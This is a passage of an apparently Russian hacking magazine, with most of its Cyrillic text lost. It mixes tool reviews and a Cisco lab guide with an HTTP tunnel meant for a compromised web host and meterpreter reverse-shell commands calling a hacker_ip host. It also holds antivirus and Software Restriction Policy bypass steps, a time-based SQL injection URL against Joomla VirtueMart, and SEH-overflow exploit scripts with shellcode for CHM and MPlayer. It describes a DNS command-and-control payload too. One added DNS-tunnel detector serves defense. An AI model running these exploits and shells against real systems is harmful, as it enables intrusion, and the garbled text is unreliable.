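    """Server side (the role of reDuh.jsp): ordinary POSTs, TCP payload base64 in the body."""
    sessions, ids = {}, itertools.count(1)   # session id -> socket to the internal host

    def log_message(self, *args): pass       # keep the demo quiet

    def _reply(self, status, body=b""):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        q = parse_qs(urlparse(self.path).query)
        op, sid = q.get("op", [""])[0], q.get("id", [""])[0]
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if op == "create":                   # the [createTunnel] step
            sid = str(next(self.ids))
            self.sessions[sid] = socket.create_connection(
                (q["host"][0], int(q["port"][0])), timeout=5)
            return self._reply(200, sid.encode())
        sock = self.sessions[sid]
        if op == "send":                     # local application -> internal host
            sock.sendall(base64.b64decode(body))
            return self._reply(200)
        if op == "recv":                     # internal host -> local application (polled)
            ready, _, _ = select.select([sock], [], [], 0.1)
            return self._reply(200, base64.b64encode(sock.recv(65536) if ready else b""))
        if op == "close":
            self.sessions.pop(sid, None)
            sock.close()
        return self._reply(200 if op == "close" else 400)


class LocalPortHandler(socketserver.BaseRequestHandler):
    """Client side (the role of reDuhClient): one endpoint session per local connection."""
    def handle(self):
        client, conn = self.server, self.request
        sid = client.call("create").decode()
        conn.settimeout(0.1)
        try:
            while True:
                try:
                    chunk = conn.recv(65536)
                    if not chunk:            # local application hung up
                        break
                    client.call("send", sid, chunk)
                except socket.timeout:
                    pass
                back = base64.b64decode(client.call("recv", sid))
                if back:
                    conn.sendall(back)
        finally:
            client.call("close", sid)


class TunnelClient(socketserver.ThreadingTCPServer):
    """Listens on a local port; every connection to it ends up at target_host:target_port."""
    daemon_threads = True

    def __init__(self, endpoint_url, target_host, target_port):
        super().__init__(("127.0.0.1", 0), LocalPortHandler)
        self.url, self.target = endpoint_url, (target_host, target_port)
        self.local_port = self.server_address[1]
        threading.Thread(target=self.serve_forever, daemon=True).start()

    def call(self, op, sid="", data=b""):
        url = "%s?op=%s&id=%s" % (self.url, op, sid)
        if op == "create":
            url += "&host=%s&port=%d" % self.target
        with OPENER.open(Request(url, data=base64.b64encode(data), method="POST"), timeout=5) as r:
            return r.read()


class Echo(socketserver.BaseRequestHandler):
    """Constructed stand-in for term-serv.victim.com: echoes what it receives."""
    def handle(self):
        data = self.request.recv(65536)
        while data:
            self.request.sendall(data)
            data = self.request.recv(65536)


def demo(message=b"hello through the tunnel"):
    """Local port -> HTTP -> endpoint -> constructed echo target and back; returns the reply."""
    echo = socketserver.ThreadingTCPServer(("127.0.0.1", 0), Echo)
    httpd = ThreadingHTTPServer(("127.0.0.1", 0), TunnelEndpoint)
    for srv in (echo, httpd):
        srv.daemon_threads = True
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    client = TunnelClient("http://127.0.0.1:%d/tunnel" % httpd.server_address[1],
                          "127.0.0.1", echo.server_address[1])
    with socket.create_connection(("127.0.0.1", client.local_port), timeout=10) as s:
        s.sendall(message)
        got = b""
        while len(got) < len(message):
            got += s.recv(65536)
    return got
```

In a real engagement the endpoint runs on the compromised web host and the client on the attacker's machine, so the only traffic crossing the perimeter is HTTP to an already permitted server; the polling "recv" call is what makes interactive protocols such as RDP feel sluggish, which is the latency the text warns about.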

Might & Magic



, . , .

Parasite Eve
,
RPG-.

PC_ZONE
Step (twitter.com/stepah)

Sikuli:
Python

, WYSIWYG-,
- ,
HTML-? Sikuli
,
.
: , .
What You See is What You Script ,
Sikuli. , . Sikuli
Wixarica ,
. 2008 ,



-
(MIT), EECS MIT
, .
, (,

)
. Sikuli
.
()
.
, hover()
Windows, , Sikuli . ,
.
,
, , Sikuli
. ,
, ,
- API. , -,
Windows/Linux/MacOS- iPhone/Android,
VNC. Sikuli
-
. , Sikuli
Jython, Python.


AutoIt.
Sikuli .
.

Sikuli

,
,
IP- Mac OS X.

,
.
, . , , .
,

. Windows.
API- :

, .
,

,

. ,
API-
.
, , ,
. , ,
AutoIt (autoitscript.com/autoit3), .
, .
, Computer Management
,
:
Run ('cmd /c "compmgmt.msc"',
@SystemDir, @SW_HIDE)
WinWaitActive("Computer Management")

, C++,
. ,
(
AutoItMacroGenerator),

-, , , Sikuli.
Linux Windows.
Sikuli Java, .
,
(click(), wait(), type() ),
, .
,
, . ,
click()
- .
?
, IDE, Sikuli.

: ,

. ,
- ,
click(),
. ,
,
. !

HTTP://WWW
links



,
Q&A,



:
answers.launchpad.
net/sikuli.


PC_ZONE

Sikuli

3 Sikuli
1. . , API.
, ,
?

Sikuli. ,
,

.
2. . ,
GUI-, ,
.
, Sikula
Robot Framework,
: bit.ly/kUYNwn.
Sikuli -.
3. . ,
Youtube ,
.
. Python,
(, , , ,
Sikuli ).

,

. :
click(img) ,
;
doubleClick(scr) ;
rightClick(scr) ;
hover(scr) img
;
exists(scr) true, ;


openApp(app) app;
switchApp(app) app (
, openApp);
type(text) text;
type(scr, text) text
scr;
popup(msg) msg.
, , . ,
.
, , -


RoutineBot (routinebot.com)
,
. ,
,
. Pascal, JScrpt Basic.
, Sikuli, ,
.
Ranorex (ranorex.com)
,
. C#, VB.NET
Python. Visual Studio
Ranorex
Recorder.
T-Plan Robot (t-plan.com)
VNCRobot ,
, VNC- ,
.
.
EggPlant (testplant.com)
, T-Plan Robot, VNC .
Linux, Windows, Mac.


Sikuli?

Like

Sikuli Script.
, GUI
.
Java Jython, . java.awt.Robot
. C++, OpenCV.
Sikuli (.sikuli) ,
Python (.py)
(.png). Sikuli . .sikuli zip
.skl-.
Sikuli IDE , . ,
Sikuli Script IDE (, Eclipse),

-.

Skype
, - ,
Python,
.
(sikuli.org/
demo.shtml), ,
.
:
1. Facebook Like.
2. Skype.
3. -,
.

4. - Bejeweled.
5. Android.
Sikuli ,
. , . z

Sikuli -


PC_ZONE

MIX 2011

5
Microsoft
MIX? ,
Microsoft
web-. ,

. 5 MIX 2011 z.
IE10 Platform Preview

IE9, MIX
Internet Explorer 10 Platform Preview 1
,
IE. ,
Platform Preview :
.
IE10 PP1 CSS3:
CSS3 Multi-column Layout
CSS3 Grid Layout


CSS3 Flexible Box Layout


CSS3 Gradients

, EcmaScript5 Strict Mode,



JavaScript,
. Strict Mode
,
delete .
IE10 PP1 DVD,
ie.microsoft.com/testdrive.

Internet Explorer Platform Preview 1

ASP.NET MVC 3

web ASP.NET MVC 3. ,


HTML5,
. ,
ASP.NET MVC Modernizer
jQuery.
WebMatrix
web-, web-,
SQL Server Compact .
WebMatrix,
web- ASP.NET PHP.
WebMatrix web-,

CMS DotNetNuke, Umbraco, WordPress
Joomla!.

Windows Phone OS 7.5

2011 Windows Phone


. ,

Windows Phone Marketplace.

,
.
WP7 ,
,
. ,
,
.
,

30% .
Internet Explorer 9
, IE
, .
JavaScript.
, HTML5 Video,
Microsoft -
: Windows Phone
26fps, iPhone 2fps, Android
11fps.
Microsoft 1 500 API ,
, ,

WebMatrix
CMS
,
, SQL- SQL Server Compact 4.0
. ,
- :
,
.
,
. ,
.
WP7:
Skype, 25 Angry
Birds.

Silverlight 5 Beta

Silverlight 5
, API.
x64- ,
.
Silverlight- :
,
;
(,
USB-);
.
, :

Trickplay /
-.
: ,
.

Kinect for Windows SDK

Kinect
, Microsoft
.
MIX SDK,
Kinect :
,
.
Kinect for Windows SDK 3D-,
Kinect ,
,
. SDK C#/VB/C++: ,
Visual Studio Kinect
SDK . z



GreenDog ,
(agrrrdog@gmail.com)
DSecRG.ru, Digital Security (agrrrdog@gmail.com)

Easy Hack
1

: EXE
OLLYDBG.

:
, , - ,
. . , , .
, exe
, , .
OpenEdge
,
. , ,
, .
? , , .
OllyDbg. -,
IDA Pro WinDbg, -,
.
, . , , (). OllyDbg
, .
. , .
, <>, .
, ,
View Patches. , OllyDbg
,
, .
, , , , .
, .udd-,
OllyDbg ( udd path ).


, ,
. , ,
. :
1.
2.
3.
4.
5.

.
Copy to Executable.
All modification.
.
Save file.

.
: exe . ,
. exe,
, .

:

OLLYDBG.

:
() . ,
,
- . ,
,
. . ,
OllyDbg ,
:
1) Options Debugging Options Security;
2) Ignore Crc of ode section.


,
INT3/0xCC, . , .
Break point manager
plug-in, : pedram.redhive.com/code/
ollydbg_plugins/olly_bp_man. / ,

:

.

:
, - :). :
- , . ,
! ,
. ,
tracerout (tracert).
ICMP- TTL 1
, ,
1.
(TTL 0 ) .
IP .
, IP- . , .

tracert. ? tracert.
? ICMP , - IP-,
.
.
-

:
WEB-.

- ? :)


. .

- . , , -
.
Immunity Debugger, .

, IP- , NAT .
BackTrack4
0trace (lcamtuf.coredump.cx) . intrace (code.google.com/p/intrace)
.
:
1)
ncat h victim_net.com 21
2)
0trace eth0 victim_net.com 21

:
h victim_net.com ;
21 , (/
);
eth0 .
, .
, .
- . ,
. TTL ()
128 , 100% Windows; 64255 , *nix.
.

:
.
,
Firefox .
. , ,
,

FF, . , ,
- .
, ,
YEHG HackerFirefox,
Ultimate Hackerfox Addons
GreaseMonkey Web Security
Toolkit (yehg.net/lab/#tools). ,
,
.
,
Mantra (getmantra.
com/download/index.html).
,
, .

.


: .

:
:)
- ,
.
. , , payload Metasploit
Framework meterpreter. , , MSF, meterpreter
. - . ,
antimeter
meterpreter . , antimeter .
post-exploitation meterpreter,
. ?
antimeter,
, . ! :) . .
, ? -.
, . shellcodeexe :
https://github.com/inquisb/shellcodeexec.
c , . ,
exe,
, .
.
1. shellcodeexe ;
2. - - ;
3. - ;
4. ( ) RWX,
, ;
5. () - .
,
.
: bernardodamele.blogspot.com/2011/04/execute-metasploitpayloads-bypassing.html. :
1. -
- EAX,

:
WINDOWS
.

:
.
(Group Policies) ,

Windows
....
, ( ).
, -
IE , . ,
.
c:\windows\system32\gpedit.
msc (secpol.msc) . ,
,
, ,
.



:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=hacker_ip R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX > payload.txt
2. meterpreter :
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=hacker_ip E
3. -
Type payload.txt > shellcodeexec.exe
4. -

. . -,
- shellcodeexe,
. -, - ( , , ),
, , . ?
- RWX-. , ,
, . , .
,
- , ,
. , , . shellcodeexe
, .

.
.
Software Restriction Policies (SRP).
Windows Program Files.
? :
Read Execute, -
, .
- , .
, SRP
, .
(. ). . ?
, :). .
, , ,
,
, .
.
.
1. - .

DVD
dvd


DVD.


2. .
3. .
4. -.

( , , ) , ,
.
, ,
.
, cached
domain credentials ( ). , . ,
.
. , ?
.
. ,
: Vista, 7-. ,
- , ,
. :).
. , -, (explorer.
exe, ) ( )
/ SRP.
, . . -,
() .
. explorer.exe ()
Windows. /,
(execute). explorer.exe,
,
.
, , .
OllyDbg ,
, .
, , ,

,
- . - :).
, . , SRP, , , . :
1. -,
().
2. dll-,
dll-.
3. -
( ).
4.
.
5. dll
, .
6. , , ,
, .

,
.
: goo.gl/BDIQt. (gpdisable.zip), ,
Microsoft -, , -,
, -, , -, .
, GPCul8or .
. . :
Gpdisable.exe c:\windows\explorer.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs,
. .

.
goo.gl/ucrhQ, , 100% .
, . z



iv (ivinside.blogspot.com)
pikofarad

. ,
:
CVSS v2 Base Score
.

01

SQL JOOMLA! COM_


VIRTUEMART

CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
CMS Joomla .
-
Virtuemart. Stratsec SQL .
-.
EXPLOIT
'com_virtuemart/classes/ps_module.php' get_dir(), 255-270:
function get_dir($basename)
{
$datab = new ps_DB;
$results = array();
$q = "SELECT module_perms FROM #__{vm}_module where
module_name='".$basename."'";
$datab->query($q);
if ($datab->next_record()) {
$results[ 'perms' ] = $datab->f("module_perms");
return $results;
}
else {
return false;
}
}

, . $basename . ,


, e GET-
page, 'com_virtuemart/virtuemart_parser.
php', 189-210:
if( $option == "com_virtuemart" ) {
    if (empty($page)) {// default page
        if (defined('_VM_IS_BACKEND')) {
            $page = "store.index";
        }
        else {
            $page = HOMEPAGE;
        }
    }
    // Let's check if the user is allowed to view the page
    // if not, $page is set to ERROR_PAGE
    $pagePermissionsOK = $ps_module->checkModulePermissions( $page );

checkModulePermissions()
'com_virtuemart/classes/ps_module.php'
page. get_dir(),
:
function checkModulePermissions( $calledPage ) {
global $page, $VM_LANG, $error_type, $vmLogger, $perm;
// "shop.browse" => module: shop, page: browse
$my_page= explode ( '.', $page );
if( empty( $my_page[1] )) {
return false;
}
$modulename = $my_page[0];
$pagename = $my_page[1];
$dir_list = $this->get_dir($modulename);

:
1. , ( ).


chm- hex-
2. Joomla '<' '>' ,
'=' .
.
,
, . ,
MySQL 5 ,
30-60 :
http://[target]/[path]/index.php?option=com_virtuemart&page=-1'+union+select+if(substring(@@version,1,1)=5,benchmark(30000000,MD5('x')),null)--+fakemodule.fakepage

benchmark(count, expr),
(count) ,
( MD5
'x'). ,
'substring(@@version,1,1)=5' . ,
@@version 5. MySQL
4- , , 4 5.
,
. :
exploit-db.com, ID 17132.
: ./17132.py [<>] -t [:] -d
[_]
: ./17132.py -p localhost:8080 -t 192.168.1.7 -d /webapps/joomla/

-,
'-p',
:.
,
.
- ,
- -.

, e . , ,
, ,
mr_me, .
doBlindSqlInjection(). ,

, ,
163-176.
TARGETS
Joomla! com_virtuemart <= v1.1.7
SOLUTION
com_virtuemart 1.1.8 1.1.7.

02


VLC MEDIA PLAYER

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
, ,
OllyDbg, VLC Media Player
AMV NSV. .
Dangling Pointer, ,
2007 Black Hat USA
(whitepaper ). libdirectx_plugin.dll 0x41-,
90. Internet Explorer
AMV,
IE.
EXPLOIT
26 Metasploit Framework
exploit/windows/browser/vlc_amv. :
$ msfconsole
# select the module
use exploit/windows/browser/vlc_amv
# payload (here: execute a command)
set PAYLOAD windows/exec
# the command to execute
set CMD calc.exe
# target (Windows XP SP3 + IE6)
set TARGET 1
# exit technique (alternatively: process)
set EXITFUNC seh
# go!
exploit

, show
options, show payloads, show targets. ,
. exploit
- , .
TARGETS
VLC Media Player <= 1.1.7.

, Metasploit
Framework :
Windows XP SP3 + IE6;
Windows XP SP3 + IE7;
Windows Vista + IE7.
SOLUTION
1.1.8, .

03


MICROSOFT HTML HELP <= 6.1

CVSSV2
7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
: HTMLHelp (Microsoft
Compressed HTML Help, Microsoft Compiled HTML Help, .CHM) ,
Microsoft 1997
WinHelp. HTML-,
,
,
. .CHM LZX.
.CHM- ,
Microsoft Windows, Windows
98, Windows NT. , , FBReader . .CHM-
Microsoft HTML Help
Workshop, Htm2Chm, Total Commandera,
.


,
l_memmove_call
EXPLOIT
itss.dll, hh.exe (, Microsoft HTML Help)
chm-, .
,
, .
(WinXP SP3):
.text:6638B251 8B 87 28 01 00 00    mov  eax, [edi+128h]
.text:6638B257 03 45 0C             add  eax, [ebp+arg_4]
.text:6638B25A 56                   push esi
.text:6638B25B 50                   push eax
.text:6638B25C FF 75 08             push [ebp+Dst]
.text:6638B25F E8 0B CC FE FF       call l_memmove_call   ; memmove (memcpy on Win7) <--- Stack overflow

, ,
,
, chm-.
,
/#WINDOWS ( 0 , ,
).
call 0x3ff7
0xb9b58 0x7f998,
, , .
, l_memmove_call
( memmove memcpy win7)

itss.dll,
...
chm- :
HTML Help Workshop;
HTML Help Workshop,
;
HTML Help table of

MPlayer Lite 33064

: pop,pop,ret
SEH-
profit.
test.hhc:
<HTML><BODY><UL><LI><OBJECT type="text/sitemap">
<param name="Name" value="test">
<param name="Local" value="test.htm">
</OBJECT></UL></BODY></HTML>

test.htm:
<HTML>
<BODY>
<img src="poc.gif">
</BODY>
</HTML>

strcpy
contents (.hhc) HTML files (.htm);
test.hhc, test.htm;
Add/Modify window definitions,
- ;
chm- (File Compile);
chm- hex-;
/#WINDOWS;
0x01, 3- 3-
0x00 0xff 0x7f;

, ,
3- ,
. ,
EIP , EIP
, 0x7fffffff.
16- (destination + 0x1c8),
, .
, ,
,
poc.gif. ,



- MSF
.
: .
# GIF89a header (logical screen 216x216) followed by filler bytes;
# bytes literals so the script also runs under Python 3
begin_of_gif = (b"\x47\x49\x46\x38\x39\x61\xD8\x00\xD8" +
                b"\x00\xD5\xFF\x00" + b"\x90" * 6)
# Next SEH: short jmp 6 bytes forward, over the handler address
nextSEHoverwrite = b"\xeb\x06\x90\x90"
# SEH handler: placeholder, to be replaced with the address of a
# pop, pop, ret sequence
SEHoverwrite = b"\x81\x81\x81\x81"
nopsled = b"\x90" * 0x1e5
# win32_exec EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = b'\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4'
payload += b'\x5b\x81\x73\x13\x6f\x02\xb1\x0e\x83\xeb\xfc'
payload += b'\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b\x53'
payload += b'\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51'
payload += b'\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71'
payload += b'\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0'
payload += b'\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b'
payload += b'\x03\x5a\x68\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5'
payload += b'\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1\x80'
payload += b'\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42'
payload += b'\xbd\x85\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4'
payload += b'\x82\x01\x0e\x6f\x02\x3a\x66\x53\x5d\x80\xf8'
payload += b'\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69'
payload += b'\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
payload += b'\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
with open("poc.gif", "wb") as new_gif:
    new_gif.write(begin_of_gif +
                  nextSEHoverwrite +
                  SEHoverwrite +
                  nopsled +
                  payload +
                  b"\xcc" * 0x1000)

TARGETS
Windows ( , Windows 7).
SOLUTION
.

Joomla! com_virtuemart

04


MPLAYER LITE 33064 (SEH)

CVSSV2
6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
Mplayer WW Windows
mplayer, (MPEG/
VOB, AVI, Ogg/OGM, VIVO, ASF/WMA/WMV, QT/MOV/MP4, RealMedia,
Matroska, NUT, NuppelVideo, FLI, YUV4MPEG, FILM, RoQ, PVA), , XAnim Win32 DLL .
Mplayer VideoCD,
SVCD, DVD, 3ivx, DivX 3/4/5, WMV H.264.
MPlayer
. X11, Xv,
DGA, OpenGL, SVGAlib, fbdev, AAlib, DirectFB, VESA ( VESA , X11)
( Matrox, 3Dfx ATI),
GGI, SDL ( ).
,
.
MPlayer MPEG, Siemens DVB, DXR2 DXR3/Hollywood+.
19 2011 C4SS!0 h1ch4m ,
mplayer ww m3u-.
.
EXPLOIT
m3u-, mplayer, strcpy, , 0xbc8008,
0x22ebb8.
.
:
0056173E C78424 78040000>  MOV DWORD PTR SS:[ESP+478],8D48E0    ; ASCII "*.rar"
00561749 C78424 7C040000>  MOV DWORD PTR SS:[ESP+47C],0
00561754 895C24 04         MOV DWORD PTR SS:[ESP+4],EBX
00561758 890424            MOV DWORD PTR SS:[ESP],EAX
0056175B E8 A8032900       CALL 007F1B08                        ; <JMP.&msvcrt.strcpy> <--- Stack overflow
00561760 8D9424 68020000   LEA EDX,DWORD PTR SS:[ESP+268]
00561767 C74424 04 2F000>  MOV DWORD PTR SS:[ESP+4],2F

SEH-.

, , SEH-
pop pop ret, Next SEH.
nop- (nopsled),
\xE9\xD4\xEB\
xFF\xFF, nop-,
.
,
. ,
.
POC-:
my $payload = "";                   # shellcode goes here; the page does not include it
my $buf = "\x90" x 100;
$buf .= $payload;
$buf .= "\x41" x (5152-length($buf));
$buf .= "\xeb\x0f\xcc\xcc";         # Next SEH: short jmp forward over the handler
# pop pop ret (SEH) from avcodec-52.dll, mplayer lite 33064
$buf .= pack('V', 0x6B04FCDE);
$buf .= "\x90" x 15;
$buf .= "\xE9\xD4\xEB\xFF\xFF";     # jmp back into the nop sled at the start
$buf .= "\x90" x 400;
open(my $fh, '>', 'poc.m3u') or die $!;   # output name chosen here; the page gives none
binmode($fh);
print $fh $buf;
close($fh);

TARGETS
Mplayer Lite 33064
SOLUTION
, m3u-,
. z



, Digital Security (twitter.com/asintsov)

DNS:

payload


, , ,
.
.
Previously on ][

, , ,
-,
. -
Metasploit, ,
DNS .
, ,
DNS-,
, (
). DNS-
. , ,
- - .
.

:
1. . - ,
DNS- _popen. ,
(data_data_data): _popen(nslookup
data_data_data.domen.ru,r). , , , .


2. msvctrl.dll. -
msvctrl, . , -
.
3. . - . ,
, .
, .
4. ,
.
5. , -
.
, , , .

, ? , , ,

.
- . ,
, C&C
DNS-. , , Acrobat
Reader , , ,

:
DNS-

:)

DNS

DNS-


DNS

DNS
-.
download&exec-.
HTTP, DNS,
.
, , , DNS.

, -,
. , kernel32.dll, . -
LoadLibrary
GetProcAddr. ,
.
: _popen (
),
WinExec,
. . _popen, nslookup ( ). WinExec
, CreateProcess .
WS2_32.dll getaddrinfo.
IP- .
-
(Acrobat Reader, ). DNS-
svchost.exe, UAC .
, WIN API :). , ,

: ?
IP-.

,
14 , 17 .
: aaaa, baaa,
caaa .
17x14 . , DNS 238 (0xEE) . 17 14?
, IPv6-,
16 , 17 .
. ,
- getaddrinfo (aaaa.domain.ru)
17 IP-. -
, .
,
( 14 , ), 14 . . -
,
14 17 . 29 010203040506..272829:
000e:0102:0304:0506:0708:0910:1112:1314
0e0e:1516:1718:1920:2122:2324:2526:2728
1c01:2900:0000:0000:0000:0000:0000:0000

238 , , . ,
%TEMP%-, ( -).
- 238 (baaa.domain.ru)
. ,
.
WinExec .
- . , -
Windows 7 x64 ( 32- !)
Windows XP SP2 x32, IPv6 .


DNS
,
! :
1. kernel32.dll.
2. GetProcAddr.
3. Loadlibrary.
4. WinExec,
getaddrinfo, exit, fopen, fwrite, fclose .
5. .
6. , .
7. getaddrinfo.
8. aaaa.domain.ru, baaa.domain.ru
.
8.1 IP-,
.
8.2 .
9. .
10. .

, .
, N
C&C- .
. .
,
, .
, ,
, , :
sleep
exit
< >

-

cmd /s < >

(), - .
XR.[name1][name2].domain.ru. name1 , name2 .
.
, , -
- . : XG.[name1][name2].domain.ru.
, IP-, IPv4.
, ,
txt-, .
TXT , ,
IDS-,


IP- , . : 1.1.1.1
, , .
IP-, , (, 84 ,
-!). . , ipconfig.
. , , DNS-
+, / =, base64.
: XX.<N>.<base64>.domain.ru, <N>
( ,
). <N> FI.
, . ,
, .
, exe-
,
. . VBS,
. nslookup
. . , .
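The naming scheme described above (tagged XR/XG/XX labels, a counter label, base64 with + and / replaced by - and _ and = dropped, and the aaaa/baaa/caaa chunk labels requested as AAAA records) is exactly what a defender can look for in resolver logs. The following is an added example, not code from the article or from DSecRG: it runs over constructed resolver log lines in an assumed "timestamp client qtype qname" format and flags query names whose labels look like encoded payload or follow the tagged or sequential patterns. The domain dom.com and all sample lines are constructed.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample resolver log (assumed format: "<ts> <client> <qtype> <qname>").
SAMPLE_LOG = """\
1302000001 10.0.0.5 A www.example.com
1302000002 10.0.0.5 AAAA aaaa.dom.com
1302000002 10.0.0.5 AAAA baaa.dom.com
1302000002 10.0.0.5 AAAA caaa.dom.com
1302000003 10.0.0.5 A XR.cmd0.cmd1.dom.com
1302000004 10.0.0.5 A XX.1.aXBjb25maWc-.dom.com
1302000005 10.0.0.5 A XX.2.V2luZG93cyBJUCBDb25maWd1cmF0aW9u.dom.com
1302000006 10.0.0.9 A mail.example.com
"""

B64_LABEL = re.compile(r'^[A-Za-z0-9+/=_-]{16,}$')  # long label made only of (URL-safe) base64 chars
SEQ_LABEL = re.compile(r'^[a-z]aaa$')               # aaaa, baaa, caaa ... chunk counter labels
TAGGED = re.compile(r'^X[A-Z]\.')                   # XR. / XG. / XX. prefixes used by the channel

def shannon_entropy(s):
    """Bits of entropy per character of a label (random-looking data scores high)."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def parse_line(line):
    ts, client, qtype, qname = line.split()
    return {"ts": int(ts), "client": client, "qtype": qtype, "qname": qname.rstrip('.')}

def registered_domain(qname):
    # Naive: last two labels; good enough for the constructed sample.
    return '.'.join(qname.split('.')[-2:])

def score_query(q):
    """Return the reasons this query looks like DNS tunnelling (empty list = nothing found)."""
    reasons = []
    labels = q["qname"].split('.')[:-2]      # everything below the registered domain
    if TAGGED.match(q["qname"]):
        reasons.append("tagged command/response label")
    for lab in labels:
        if B64_LABEL.match(lab) and shannon_entropy(lab) > 3.5:
            reasons.append("high-entropy base64-like label %r" % lab)
    if q["qtype"] == "AAAA" and any(SEQ_LABEL.match(lab) for lab in labels):
        reasons.append("sequential AAAA chunk label")
    return reasons

def analyse(log_text):
    """Return ({qname: reasons}, {registered_domain: suspicious_query_count})."""
    findings = {}
    per_domain = defaultdict(int)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        q = parse_line(line)
        reasons = score_query(q)
        if reasons:
            findings[q["qname"]] = reasons
            per_domain[registered_domain(q["qname"])] += 1
    return findings, dict(per_domain)

if __name__ == "__main__":
    found, counts = analyse(SAMPLE_LOG)
    for name, why in found.items():
        print(name, "->", "; ".join(why))
    print("suspicious queries per domain:", counts)
```

The per-domain count is the useful aggregate: a single odd label is noise, but many flagged queries from one client to one registered domain in a short window is the signature of a tunnel, and the AAAA volume stands out further on a network that does not use IPv6.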

. ,
. .
.
, , ,
. ,
, sleep.
.
, . ,
, ,
. timeout,
. .
, <CTRL-C> .
, .
CTRL-C.


.
sleep.
, dnsBOT.
name1.name2.txt ( ),
. , CTRL-C.

-
:)

windows. , ( Acrobat Reader), .


:

, ,
, , :).

. :
, .
revdns.pl, 53 . :
$EGG="d:\\DROP.VBS";
$defaultcmd="ipconfig";
$DOMAIN="dom.com";
$IPA="127.0.0.1";




IP- DNS

, , DNS
: (,
) . : nslookup q=AAAA aaaa.dom.com
238 DROP.VBS.
, DROP.VBS:
DOMAIN="dom.com"

, -,
. . dnsdrop.rb
, c:\<MSF>\modules\payloads\singles\

set DOMAIN=dom.com
set FILE=vbs

PDF , .
, perl
. ,
.

.

, DNS . , PoC ,
DNS
, , , ! , - CONFidence 2011
DSecRG. , ,
][!
, ,
( /)

!
P.S.
, . z



(alumni.samara@gmail.com)

Cisco

,
VPN
? .


(VPN)
.
() ,
IP Ethernet. -, ,
- ,
. , ,
( ).


Ethernet
VLAN. , , -.
VLAN .
, Dynamips,
Cisco
Windows.
Cisco IOS (
).

idlepc get routername


Dynamips -: Dynagen GNS3
( Dynamips).
Dynagen (dynagen.org).
:
Dynagen Sample Labs
Cisco;
Dynamips Server ;
Network device list ,
( , );
Pemu Server Cisco PIX.

. Cisco IOS 7200,
Dynamips, , .
,
c3745-advipservicesk9-mz.124-15.T6.bin.
Dynagen ,
Cisco IOS, ,
7z rar,
.


DATA-

Dynagen *.net,
, .
,
:
# Simple Cisco 3745 with 2 real interfaces
autostart = False
[localhost]
[[3745]]
image = \Program Files\Dynamips\images\c3745-advipservicesk9-mz.124-15.T6.bin
idlepc = 0x613f07b4
npe = npe-300
ram = 160
[[ROUTER R1]]
console = 2000
model = 3745
cnfg = configs\cisco_3745.cfg
slot1 = NM-16ESW
slot2 = PA-2FE-TX
F1/0 = NIO_gen_eth:\Device\NPF_{7C94C2DF-C005-489D-9E50-3199AEFE6F27}
F2/1 = NIO_gen_eth:\Device\NPF_{3209EAAB-22CD-453A-965A-D02490DB7EDE}

Network device list


, , .
[localhost] , Dynamips.
[[3745]] ,
. [localhost].
, ,
localhost. ,
Cisco 3745, .
image Cisco IOS
c3745-advipservicesk9-mz.124-15.T6.bin.
,
.
npe = npe-300
3745 Network Processing Engine 300.
ram = 160
160 .
, ,
,
,
, 256
.
idlepc = 0x613f07b4 ,
.
100%. ,
.
telnet , enable-,
.
Dynagen idlepc get routername (
idlepc get R1).
,
.
<Enter>. CPU
.
. idlepc show
routername ( idlepc show R1).
, ,
- . ,
,
.
[[ROUTER R1]] , . R1 , Dynamips, hostname
.
slot1 = NM-16ESW 1
NM-16ESW (FastEthernet 16 ),
.
slot2 = PA-2FE-TX 2
PA-2FE-TX (FastEthernet 2 ).
, , .
cnfg = configs\cisco_3745.cfg ,

INFO

info
Dynamips

PIX (Private Internet
Exchange).

,

VLAN ID
trunk.

Metasploit

STP spoof/cisco/
stp spoof/cisco/
pvstp.
VLANe,

VLAN, ,

.


trunk

trunk

Cisco

Metasploit Framework
,
, BGP (Border
Gateway Protocol, ),
FullView (), .

- Quagga.

. , , vk.com/club21939124
.
Dynamips Server,
3745_router.net (
). 2 :
Dynamips .
,
:
List ;
Start ;
Start /all ;
Start R1 R1 ( );
Stop ;
Stop /all ;
Stop R1 R1 ( );
Telnet ;
Telnet /all ;
Telnet R1 R1 ( ).
, Telnet, F1/0 access
port VLAN1 trunk port native VLAN1 VLAN2. ,
.

trunk DTP

(Dynamic Trunking Protocol)



. Cisco Catalyst
mode access, mode trunk,
DTP .
,
.

VLAN. , ,
VLAN,
.
,
-



. , Cisco
DTP,

.
auxiliary/spoof/cisco/dtp (metasploit.com/modules/auxiliary/spoof/cisco/dtp)
. -
RHOST IP-
